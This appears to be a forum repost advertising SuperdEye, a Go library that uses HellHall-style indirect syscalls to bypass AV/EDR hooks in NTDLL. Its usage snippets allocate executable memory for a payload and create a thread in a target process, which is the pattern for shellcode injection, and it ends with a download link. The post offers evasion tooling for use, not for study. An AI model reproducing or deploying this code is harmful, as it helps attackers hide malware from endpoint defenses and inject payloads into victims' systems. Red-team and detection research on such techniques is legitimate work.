Source Code SuperdEye - bypass of AV/EDR

[dEEpEst]

SuperdEye is the implementation of HellHall (a revised version of TartarusGate) in pure Go and Go Assembler.

The purpose is to scan hooked NTDLL and retrieve the Syscall number to then do an indirect Syscall with it, thus allowing the bypass of AV/EDR that put hooks on functions.

Usage​

Just import the package and use it !

The SuperdEye package exposes the SuperSyscall that can be used to do Indirect syscall.

import (
    "fmt"
    "unsafe"

    "github.com/almounah/superdeye"
)
...

    NTSTATUS, err = superdeye.SuperdSyscall("NtCreateThreadEx", uintptr(unsafe.Pointer(&hThread)), uintptr(0x1FFFFF), uintptr(0), handleProcess, pBaseAddress, uintptr(0), uintptr(0), uintptr(0), uintptr(0), uintptr(0), uintptr(0))
    if err != nil {
        fmt.Println("Syscall was not executed... Likely the Syscall was not found or a bug...")
        fmt.Println(err.Error())
    }
    fmt.Println("Syscall NtCreateThreadEx Made with NTSTATUS ", NTSTATUS)

For better usability, some syscall are already wrapped to be compatible with the official golang.org/x/sys/windows package.

import (
    "fmt"
    "unsafe"

    "github.com/almounah/superdeye"
    "golang.org/x/sys/windows"
)
...
    pBaseAddress, NTSTATUS, err := superdeye.NtAllocateVirtualMemory(windows.Handle(handleProcess), uintptr(0), uintptr(len(payloadClearText)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE)
    if err != nil {
        fmt.Println("Syscall was not executed... Likely the Syscall was not found or a bug...")
        fmt.Println(err.Error())
    }
    fmt.Println("Syscall NtAllocateVirtualMemory Made with NTSTATUS ", NTSTATUS)
...

More Syscalls will be made compatible with the official windows package in the future (Contributions are welcome in superdwrapper.go)

Download